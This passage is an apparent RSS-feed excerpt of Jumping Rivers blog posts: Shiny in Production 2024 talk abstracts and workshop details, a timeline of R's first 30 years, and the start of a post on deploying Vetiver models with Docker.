&lt;p&gt;You&amp;rsquo;ve created a prototype visualisation, fine-tuned it so it looks amazing and perfectly on-brand, and turned the plot code into a function so that you can run it again on different data and highlight different aspects of the story. Others on the team have seen how good the outputs look and they want in on the magic! But they don&amp;rsquo;t want to learn R.&lt;/p&gt;
&lt;p&gt;This talk will offer a behind-the-scenes look at the process of creating a Shiny App that functions as a black box to get straight from the data to high-end parameterised visualisations. We&amp;rsquo;ll start by looking at creating parameterised plot functions using ggplot, before exploring how to bring the data and parameterisation into Shiny to create a seamless no-code data-to-viz workflow for the users.&lt;/p&gt;
&lt;h4 id="gareth-burns---exploristics"&gt;&lt;a href="https://www.linkedin.com/in/drgarethburns/" rel="external"&gt;Gareth Burns&lt;/a&gt; - &lt;a href="https://exploristics.com/" rel="external"&gt;Exploristics&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Shiny in Secondary Education: Supplementing traditional learning resources to allow students to explore statistical concepts&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/gareth@2x.jpg" alt="Photo of Gareth Burns" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;The Statisticians in the Pharmaceutical Industry (PSI) Schools Outreach initiative aims to promote data literacy and statistical concepts to the next generation of Statisticians and Data Scientists. Volunteers attend secondary schools to present specialised workshops which are designed to be interactive, engaging and aligned to the national curriculum for different age groups.&lt;/p&gt;
&lt;p&gt;The PSI Visualisation Special Interest Group (VIS SIG) created a Shiny application to supplement an existing workshop for Asthma. This workshop aims to introduce the students to analysis of continuous data and make them think about concealing treatment assignment and consider false positive and false negative results. The application allowed electronic data capture and gave students the ability to dynamically explore their own data, reinforcing the statistical concepts and making learning more engaging and accessible.&lt;/p&gt;
&lt;p&gt;Each school is different in terms of class size, computer resources and student abilities, so the application needed to be flexible enough to account for this and to enable independent set-up by a volunteer instructor. User experience and accessibility were fundamental to the design, to ensure the application was appropriate for a classroom environment and the data visualisations were at an appropriate level for students.&lt;/p&gt;
&lt;p&gt;In this presentation we discuss the range of issues involved in getting a Shiny application, implemented by a team of volunteers, into a classroom setting. This includes flexible project management for a team of volunteers, use of persistent storage to enable multiple simultaneous users and use of Shiny modules to make code flexible and scalable for future workshops.&lt;/p&gt;
&lt;h4 id="cassio-felix-jardim---data4shiny"&gt;&lt;a href="http://linkedin.com/in/cassio-f%C3%A9lix-462666b1" rel="external"&gt;Cassio Felix Jardim&lt;/a&gt; - &lt;a href="https://data4shiny.shinyapps.io/data4shiny/" rel="external"&gt;Data4Shiny&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Creating any User Interface in Shiny: The Importance of CSS in Shaping Shiny Apps&amp;rsquo; User Interface&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/cassio@2x.jpg" alt="Photo of Cassio Felix Jardim" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;The main goal of this presentation is to use CSS concepts to assist in building User Interfaces for Dashboards constructed through Programming Languages. In particular, the R language and its Dashboard creation package (shiny package).&lt;/p&gt;
&lt;p&gt;The presentation aims to demonstrate that CSS is crucial for organizing the elements of our Dashboard on the screen and also for the aesthetic aspect of the Dashboard User Interface.&lt;/p&gt;
&lt;p&gt;Through the concepts of CSS Flexbox and CSS Grid, the presentation will take on a tutorial format where the entire process of constructing the user interface of any dashboard will be covered from start to finish. The main idea is to consider elements of storytelling, UI Design, and UX Design in the process of building a Dashboard.&lt;/p&gt;
&lt;p&gt;The Shiny package and its entire ecosystem include various packages that bridge the gap between Data Science and Web Design, especially languages like HTML, CSS, and JavaScript. Creating this &amp;ldquo;bridge&amp;rdquo; between the worlds of Data Science and Web Design is my main objective.&lt;/p&gt;
&lt;h4 id="katy-morgan---government-internal-audit-agency"&gt;Katy Morgan - &lt;a href="https://www.gov.uk/government/organisations/government-internal-audit-agency" rel="external"&gt;Government Internal Audit Agency&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;More than just a chat bot: Tailoring the use of Generative AI within Government Internal Audit Agency with user-friendly R shiny applications&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/katy@2x.jpg" alt="Photo of Katy Morgan" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Generative AI offers huge potential for driving creativity by suggesting new ideas and perspectives and can also improve efficiency by rapidly processing and extracting insights from large volumes of text. However, using a chatbot-style tool such as ChatGPT can be overwhelming as users have to work out, through trial and error, which questions and instructions give them the outputs they need. The Government Internal Audit Agency’s data analytics team has created two R shiny web applications, each of which simplifies the user’s experience of using generative AI by providing a user-friendly interface and implementing a set of standardised prompts. The Risk Engine walks the user through a stepwise process to explore and articulate the potential risks that might impact any given business objective. The Writing Engine enables users to analyse and generate text in several ways, including generating a draft audit report from rough notes, and summarising common themes from a set of audit reports. This presentation will cover the process of developing and deploying the web applications and the challenges we faced along the way, describing how we tailored the appearance and functionality of the apps to best meet user needs.&lt;/p&gt;
&lt;h4 id="keith-newman---jumping-rivers"&gt;Keith Newman - &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Title coming soon&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/keith@2x.jpg" alt="Photo of Keith Newman" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Following a PhD in statistics at Newcastle University, Keith developed software to improve road safety modelling. He enjoys creating Shiny apps and teaching the use of R.&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h4 id="vikki-richardson---audit-scotland"&gt;&lt;a href="https://www.linkedin.com/in/vikkirichardsondata/" rel="external"&gt;Vikki Richardson&lt;/a&gt; - &lt;a href="https://audit.scot/" rel="external"&gt;Audit Scotland&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Faster than a Speeding Arrow - R Shiny Optimisation In Practice&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/vikki@2x.jpg" alt="Photo of Vikki Richardson" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;The task of optimising your R Shiny apps for great performance can be challenging. Ensuring your code is efficient, using promises where you can, caching resources, and reducing the number of widgets or reactive variables can all help. But datasets can’t be squeezed any more – or can they? By storing larger chunks of data in Arrow format and using the Arrow package for manipulation, we were able to speed up some slower computations by at least one order of magnitude - often more.&lt;/p&gt;
&lt;p&gt;This presentation will cover a case study of migrating a financial data auditing system to Arrow data storage. Because of Arrow, we were able to drop from two Connect servers to one, making management very happy with the cost savings - and delighting our users with the new, snappier application.&lt;/p&gt;
&lt;h3 id="lightning-talks"&gt;Lightning talks&lt;/h3&gt;
&lt;h4 id="yigit-aydede---saint-mary"&gt;&lt;a href="https://yaydede.github.io/" rel="external"&gt;Yigit Aydede&lt;/a&gt; - &lt;a href="https://www.smu.ca/" rel="external"&gt;Saint Mary&amp;rsquo;s University&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Transforming Community Understanding: A Shiny Application for Real-Time Crime and Real Estate Market Insights in Nova Scotia&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/yigit@2x.jpg" alt="Photo of Yigit Aydede" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;This presentation showcases the Nova Scotia Property Insights (NSPI) application, a Shiny-based tool designed to provide comprehensive neighborhood insights through the integration of crime statistics and real estate market data. NSPI leverages the power of interactive maps to offer users a dynamic and engaging experience, facilitating informed decision-making for residents, potential homebuyers, policymakers, and researchers.&lt;/p&gt;
&lt;p&gt;The core functionality of NSPI includes real-time visualization of crime data and property market trends across Nova Scotia neighborhoods. Users can select specific areas on the map to view detailed statistics within customizable radii, offering a granular perspective on local conditions. The application features a user-friendly interface with multiple tabs, including crime type comparisons, real estate market analysis, and historical data trends.&lt;/p&gt;
&lt;p&gt;One of the key innovations of NSPI is its ability to allow users to perform side-by-side neighborhood comparisons. By simply clicking on different map areas, users can generate comparative reports that highlight variations in crime rates and property values. This feature is particularly valuable for those considering relocation or investment in Nova Scotia.&lt;/p&gt;
&lt;p&gt;The presentation will delve into the technical aspects of developing NSPI, including data integration, user authentication, and the creation of a responsive UI. Additionally, we will discuss the challenges encountered and the solutions implemented to ensure data accuracy and user engagement.&lt;/p&gt;
&lt;h4 id="abbie-brookes--jeremy-horne---datacove"&gt;&lt;a href="https://www.linkedin.com/in/abbiebrookes/" rel="external"&gt;Abbie Brookes&lt;/a&gt; &amp;amp; &lt;a href="https://www.linkedin.com/in/jeremy-horne-datacove/" rel="external"&gt;Jeremy Horne&lt;/a&gt; - &lt;a href="https://datacove.co.uk/" rel="external"&gt;Datacove&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Shiny Policies: Dashboards to Aid British Government Decisions&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/abbie@2x.jpg" alt="Photo of Abbie Brookes" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;img src="images/jeremy@2x.jpg" alt="Photo of Jeremy Horne" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;In collaboration with Natural England, Datacove developed a bespoke Shiny dashboard for informed government decision-making, covering Health and Wellbeing, Nature, and Sustainability (HWNS). This presentation will outline three major topics: project and data management, our approach to customization, and the route taken to enhance usability.&lt;/p&gt;
&lt;p&gt;The first phase involved project and data management to establish clear expectations. By engaging with Natural England stakeholders, we ensured that the envisioned product met their specific needs and provided a tangible preview of the dashboard&amp;rsquo;s functionality and design. We connected to government APIs and used R to extract, process, and transform multiple sources of HWNS data, bringing this information into one place for localised decision-making.&lt;/p&gt;
&lt;p&gt;In the second phase, we focused on customisation to ensure seamless integration with Natural England&amp;rsquo;s existing webpage. Using the brand guidelines and custom CSS/JavaScript, we ensured that the dashboard had the same look and feel as other products built outside of Shiny. This step was crucial in maintaining a cohesive user experience by complementing their established digital ecosystem, making the dashboard easy to access and increasing the likelihood of use.&lt;/p&gt;
&lt;p&gt;In the third phase, we emphasized making the dashboard accessible to all, regardless of data literacy. We implemented user-friendly design principles, pre-calculated dynamic stats, and intuitive navigation. For example, we built interactive charts using libraries such as Leaflet and Highcharts, which ensured that comparisons were clear and easy to explore dynamically. We will demonstrate our tips for easy interactive visualisations.&lt;/p&gt;
&lt;p&gt;Throughout the project, we adopted best practices in data interpretation and are looking forward to sharing our insights at Shiny in Production.&lt;/p&gt;
&lt;h4 id="david-carayon---inrae"&gt;&lt;a href="https://dcarayon.fr/" rel="external"&gt;David Carayon&lt;/a&gt; - &lt;a href="https://www.inrae.fr/en" rel="external"&gt;INRAE&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;The SK8 project: A scalable institutional architecture for managing and hosting Shiny applications&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/david@2x.jpg" alt="Photo of David Carayon" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Introducing the SK8 Project (Shiny Kubernetes Service), where data scientists, statisticians and engineers from INRAE, the French national research institute for agriculture, food and environment, have teamed up to create a new solution for managing and hosting Shiny applications.&lt;/p&gt;
&lt;p&gt;Shiny has become very popular in our institute, widely used for sharing, showcasing, and democratizing scientific work. However, the enduring challenge of establishing scalable, secure, and sustainable hosting for these apps had yet to be addressed.&lt;/p&gt;
&lt;p&gt;So, after realizing that different research labs had each implemented their own local and makeshift solutions, we put on our thinking caps and decided to craft an open-source institutional solution. Our mission? Break down silos, unite the R community at INRAE, and make hosting applications easy for Shiny developers with no IT backgrounds.&lt;/p&gt;
&lt;p&gt;The SK8 infrastructure allows Shiny code to be hosted on a GitLab instance open to all INRAE staff. We&amp;rsquo;ve got pipelines (GitLab CI/CD), stability ({renv}), containerization with Docker, scalability and seamless deployment in a Kubernetes cluster. All of this is developed, managed, and maintained by the SK8 team using open-source solutions.&lt;/p&gt;
&lt;p&gt;Using SK8 is a piece of cake – just toss your application code into a dedicated GitLab project and hit the “play” button.&lt;/p&gt;
&lt;p&gt;In this talk, we will be speaking about the project itself, the ecosystem that&amp;rsquo;s making it all happen and how you could replicate this in your own company.&lt;/p&gt;
&lt;h4 id="juan-ramon-vallarta-robledo---find"&gt;&lt;a href="http://www.linkedin.com/in/juanvallarta" rel="external"&gt;Juan Ramon Vallarta Robledo&lt;/a&gt; - &lt;a href="https://www.finddx.org/" rel="external"&gt;FIND&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Chagas diagnostic algorithms: an online application to estimate cost and effectiveness of diagnostic algorithms for Chagas disease&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/juan@2x.jpg" alt="Photo of Juan Ramon Vallarta Robledo" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Chagas disease, caused by the Trypanosoma cruzi parasite, is a significant public health concern in Latin America, with an estimated 6-7 million people affected and increasing incidence rates worldwide. Examining the available diagnostic tests and their cost-effectiveness is essential for improving early diagnosis, which is crucial in managing the disease and preventing severe chronic conditions. To address this, FIND, a non-profit organization dedicated to facilitating equitable access to reliable diagnosis, developed &lt;a href="https://github.com/finddx/chagaspathway" rel="external"&gt;Chagaspathways&lt;/a&gt; to provide guidance for Chagas disease testing.&lt;/p&gt;
&lt;p&gt;The application is built entirely using Shiny and incorporates a separate R library (&lt;a href="https://github.com/finddx/patientpathways" rel="external"&gt;patientpathways&lt;/a&gt;), developed by FIND, that contains all the analysis algorithms. It is designed to let users select different scenarios and specify parameters about the target population they are analyzing, like prevalence, testing costs, and the type of test used. The results show the recommended testing approach, the expected number of diagnosed cases, the cost per diagnosed case, along with the positive and negative predictive values. A comprehensive outcomes table is included in the results section and users have the option to download the results as an HTML report, to help them with further dissemination.&lt;/p&gt;
&lt;p&gt;The Chagaspathways application is designed to be a user-friendly tool for public health professionals, recommending the most economical testing approaches to maximize resources and achieve the best results for patients and healthcare infrastructures. The application is intended to expand its scope to cover additional diseases, aiming to become an essential asset in global health initiatives for disease diagnostic modeling.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://shiny-in-production.jumpingrivers.com/"&gt;&lt;button class="buttony-link central-content" type="button"&gt;Register
now&lt;/button&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2024-full-lineup/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2024: Workshops</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-2024-workshop-announcement/</link><pubDate>Thu, 04 Jul 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-2024-workshop-announcement/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2024-workshop-announcement/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-2024-workshop-announcement/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
main h3 a:after { content: unset; }
main h3 a { text-decoration: unset; }
&lt;/style&gt;
&lt;p&gt;Shiny in Production is returning to the Catalyst, Newcastle upon Tyne,
for its third instalment this October. We’ve expanded the itinerary this
year, with four workshops to choose from as well as a day of talks, with
speakers soon to be announced. Full details of the workshops are below,
and you can head over to the &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;conference
website&lt;/a&gt; to register.
Join us for an immersive experience tailored for both beginners and
advanced users of Shiny and other web-based R packages.&lt;/p&gt;
&lt;p&gt;The first day of the conference (Wednesday 9th October) will consist of
the four parallel workshops, followed by a drinks reception in the
evening, a great opportunity for networking and debriefing from the
day’s learning.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://shiny-in-production.jumpingrivers.com/"&gt;&lt;button class="buttony-link central-content" type="button"&gt;Register
now&lt;/button&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="level-up-your-plots-tips-tricks-and-resources-for-crafting-compelling-visualisations---cara-thompson"&gt;Level up your plots: Tips, tricks and resources for crafting compelling visualisations - &lt;a href="https://www.cararthompson.com/" rel="external"&gt;Cara Thompson&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Data visualisations are a great asset in getting people talking about
your findings. From making the patterns in the data easy to see, to
making a big visual statement and keeping people talking beyond the end
of your presentation, transforming your plots from functional to
aesthetically pleasing and visually compelling is about so much more
than making things pretty.&lt;/p&gt;
&lt;p&gt;In this workshop, we’ll explore how we can make the most of colours,
different plot types, text, and interactivity to maximise the impact of
our visualisations. Here’s where we’re looking to boost your dataviz
confidence:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;crafting intuitive dataviz-friendly colour palettes without
compromising on accessibility (or creativity!)&lt;/li&gt;
&lt;li&gt;selecting the right type of dataviz for your data and your story&lt;/li&gt;
&lt;li&gt;making the most of typography to optimise text hierarchy and
readability&lt;/li&gt;
&lt;li&gt;using annotations wisely to both help interpretation and declutter the
visualisations&lt;/li&gt;
&lt;li&gt;turning your ggplot into an interactive plot for additional data
exploration&lt;/li&gt;
&lt;li&gt;packaging up your decisions for easy reuse across plots (and projects!)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This is intended as a hands-on workshop, so bring along a laptop, a plot
you’re working on or a research question, and some data. Throughout the
workshop, I will highlight free resources for each of these aspects of
dataviz development. The aim is for you to leave with a plot that you’d
be happy to publish, and with some resources you can continue to build
on.&lt;/p&gt;
&lt;h4 id="about-the-speaker"&gt;About the speaker&lt;/h4&gt;
&lt;p&gt;&lt;br&gt; &lt;br&gt;&lt;/p&gt;
&lt;img src="images/cara@2x.jpg" alt="Photo of Cara Thompson" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Cara is a freelance data consultant with an academic background,
specialising in dataviz and in “enhanced” reproducible outputs. She
lives in Edinburgh, Scotland, and is passionate about maximising the
impact of other people’s expertise.&lt;/p&gt;
&lt;p&gt;&lt;br&gt; &lt;br&gt;&lt;/p&gt;
&lt;h3 id="building-responsive-shiny-applications---pedro-silva"&gt;Building Responsive Shiny Applications - &lt;a href="https://pedrocsilva.com/" rel="external"&gt;Pedro Silva&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;The diverse range of devices used for modern web browsing presents
challenges when designing an application that works well for all users.
Enter responsive design: the practice of building fluid web pages that
“work” on huge 4k and 5k monitors, tiny smartphones and all things in
between. This course will look at responsive design principles and best
practices for Shiny developers, covering page layout, easy-to-add
widgets and some simple CSS tricks for when built-in solutions don’t
quite cut it.&lt;/p&gt;
&lt;p&gt;By the end of the workshop, participants will…&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;know what responsive web design is&lt;/li&gt;
&lt;li&gt;know how to use flexible grids to adjust page layout for mobile,
tablet and desktop&lt;/li&gt;
&lt;li&gt;be able to use HTML5 elements and Shiny Widgets to use limited space
efficiently and effectively&lt;/li&gt;
&lt;li&gt;know how to add CSS and JavaScript snippets to an app for finer
customisations&lt;/li&gt;
&lt;li&gt;understand how to test Shiny apps on various screen sizes from desktop
to mobile&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="about-the-speaker-1"&gt;About the speaker&lt;/h4&gt;
&lt;p&gt;&lt;br&gt; &lt;br&gt;&lt;/p&gt;
&lt;img src="images/pedro@2x.jpg" alt="Photo of Pedro Silva" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Pedro is a full stack developer with over 15 years of experience in the
field, loves front-end and R Shiny development, and is a moonlight
practitioner of JavaScript dark arts.&lt;/p&gt;
&lt;p&gt;&lt;br&gt; &lt;br&gt; &lt;br&gt; &lt;br&gt;&lt;/p&gt;
&lt;h3 id="asynchronous-shiny---russ-hyde"&gt;Asynchronous Shiny - &lt;a href="https://github.com/russHyde" rel="external"&gt;Russ Hyde&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Imagine you couldn’t register to attend “Shiny in Production” if someone
else was in the process of registering, and you had to wait until they
had finished before you could click to “Buy tickets on EventBrite”. This
kind of “blocking” shouldn’t happen in modern web applications but is
surprisingly common in Shiny applications. It happens because a single R
process handles all of the server-side processing for multiple users—one
long-running task can prevent any other task from proceeding, hampering
interactivity both between and within user-sessions.&lt;/p&gt;
&lt;p&gt;Fortunately, Shiny’s support for asynchronous programming can alleviate
this problem. In the asynchronous approach, you start tasks running
without having to wait for them to complete. But, this requires a change
in mindset for many programmers and there are a few concepts to
understand before you can take advantage of this approach. So, what are
you waiting for? Sign up for this workshop!&lt;/p&gt;
&lt;p&gt;By the end of the workshop, participants will…&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;understand how within-session and between-session blocking can arise
in a Shiny app&lt;/li&gt;
&lt;li&gt;understand the basics of asynchronous computation&lt;/li&gt;
&lt;li&gt;solve between-session blocking with future/promise&lt;/li&gt;
&lt;li&gt;solve blocking the modern way, with ExtendedTask&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="about-the-speaker-2"&gt;About the speaker&lt;/h4&gt;
&lt;p&gt;&lt;br&gt; &lt;br&gt;&lt;/p&gt;
&lt;img src="images/russ@2x.jpg" alt="Photo of Russ Hyde" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Russ has previously worked in molecular biology and bioinformatics. He
holds a PhD in Molecular Physiology and MSc in Mathematics. Russ is an
author of several CRAN packages and a mentor in the R for Data Science
community.&lt;/p&gt;
&lt;p&gt;&lt;br&gt; &lt;br&gt;&lt;/p&gt;
&lt;h3 id="building-apps-for-humans---clarissa-barratt"&gt;Building Apps for Humans - &lt;a href="https://www.linkedin.com/in/clarissajbarratt/" rel="external"&gt;Clarissa Barratt&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Frameworks like Shiny and Dash can help those with a scientific or
mathematical background communicate their research in a way that’s
interactive and engaging. But while these tools can make constructing a
graphical user interface quicker and easier, there’s no guarantee that
the end product is going to be optimised for human use.&lt;/p&gt;
&lt;p&gt;This workshop is aimed at scientists (and the curious) who are
interested in learning some basics of human-computer interaction and
gaining an understanding of how science itself can assist with the
development of better user interfaces that, in turn, lead to improved
user experiences.&lt;/p&gt;
&lt;p&gt;By the end of the workshop, participants will…&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;understand the benefits that come from designing applications with the
human mind in mind&lt;/li&gt;
&lt;li&gt;know how the layout, colour, size and motion of interface and
graphical components can be used to enhance (or detract from) a user’s
experience&lt;/li&gt;
&lt;li&gt;understand the importance of providing users with feedback so they can
tell both whether their actions have been successful and what the
current state of the application is&lt;/li&gt;
&lt;li&gt;be able to identify some common problems found in web applications&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="about-the-speaker-3"&gt;About the speaker&lt;/h4&gt;
&lt;p&gt;&lt;br&gt; &lt;br&gt;&lt;/p&gt;
&lt;img src="images/clarissa@2x.jpg" alt="Photo of Clarissa Barratt" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;While working towards her PhD in applied mathematics, Clarissa discovered
her love of science communication. Her goal is to make data science
accessible to everyone, and to encourage people to engage with the
goings-on at Jumping Rivers.&lt;/p&gt;
&lt;p&gt;&lt;br&gt; &lt;br&gt; &lt;br&gt;&lt;/p&gt;
&lt;h3 id="whats-next"&gt;What’s next?&lt;/h3&gt;
&lt;p&gt;Early bird tickets for the conference are still available until the end
of July, so don’t miss out! The full line-up of speakers will be
announced in the coming weeks. Still not convinced? Head over to our
&lt;a href="https://www.youtube.com/@jumping-rivers" rel="external"&gt;YouTube channel&lt;/a&gt; to take a
look at line-ups from previous years and see what we have in store.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://shiny-in-production.jumpingrivers.com/"&gt;&lt;button class="buttony-link central-content" type="button"&gt;Register
now&lt;/button&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2024-workshop-announcement/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>A timeline of R's first 30 years</title><link>https://www.jumpingrivers.com/blog/r-timeline/</link><pubDate>Thu, 27 Jun 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-timeline/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-timeline/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-timeline/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;link rel="stylesheet" type="text/css" href="assets/style.css" /&gt;
&lt;script src="assets/resize.mjs" type="module"&gt;&lt;/script&gt;
&lt;p&gt;August 2023 marked the thirtieth anniversary of the first public release of the R programming language. To celebrate this, and to show how far the language has evolved across those three decades, the timeline below shows some landmark events, packages and papers (with some Jumping Rivers items thrown in for good measure). Have we missed any of your personal favourites? Let us know via our social media channels and we&amp;rsquo;ll see if we can squeeze them in. On browsers that support it, double click/tap on any image or video on the timeline to see it full screen.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-r-timeline"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;You can also view the timeline as a &lt;strong&gt;&lt;a href="https://www.jumpingrivers.com/misc/timeline/"&gt;standalone page&lt;/a&gt;&lt;/strong&gt;.&lt;/p&gt;
&lt;iframe id="timeline" title="Timeline of landmarks related to the R programming language from 1993 to 2023" src="https://www.jumpingrivers.com/misc/timeline" scrolling="no" frameBorder="0" width="100%"&gt;&lt;/iframe&gt;
&lt;aside&gt;
&lt;p&gt;The timeline idea was inspired by Figure 1 in the article &lt;a href="https://www.mdpi.com/2075-1729/12/5/648" rel="external"&gt;&amp;ldquo;The R Language: An Engine for Bioinformatics and Data Science&amp;rdquo;&lt;/a&gt; by Federico M. Giorgi, Carmine Ceraolo and Daniele Mercatelli in the open-access journal &lt;a href="https://www.mdpi.com/journal/life" rel="external"&gt;&lt;em&gt;Life&lt;/em&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-timeline/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Vetiver: Model Deployment</title><link>https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment-docker/</link><pubDate>Thu, 20 Jun 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment-docker/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment-docker/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment-docker/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is Part 2 of a series of blogs on {vetiver}:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/"&gt;Vetiver: First steps in MLOps&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: Vetiver: Model Deployment (this post)&lt;/li&gt;
&lt;li&gt;Part 3: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-monitoring-mlops-deployment/"&gt;Vetiver: Monitoring Models in Production&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 4: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-mlops-python-deployment/"&gt;Vetiver: MLOps for Python&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="introduction"&gt;Introduction&lt;/h2&gt;
&lt;p&gt;In our previous blog, we provided an overview of MLOps and the
&lt;a href="https://rstudio.github.io/vetiver-r/" rel="external"&gt;{vetiver}&lt;/a&gt; package, creating and
deploying a simple model locally. In this post, we’ll show you how to
deploy a model to production using &lt;a href="https://posit.co/products/enterprise/connect/" rel="external"&gt;Posit
Connect&lt;/a&gt;,
&lt;a href="https://aws.amazon.com/sagemaker/" rel="external"&gt;SageMaker&lt;/a&gt;, and Docker.&lt;/p&gt;
&lt;h2 id="what-is-docker"&gt;What is Docker?&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.docker.com" rel="external"&gt;Docker&lt;/a&gt; is an open-source platform that allows
developers to build, deploy, and run containers. These containers bundle
application source code with the operating system libraries and
dependencies needed to run that code.&lt;/p&gt;
&lt;p&gt;Previously, we discussed deploying a &lt;a href="https://www.jumpingrivers.com/blog/shiny-auto-docker/" rel="external"&gt;Shiny
Application&lt;/a&gt;
using Docker. Similarly, we can deploy a set of APIs to access our
model.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
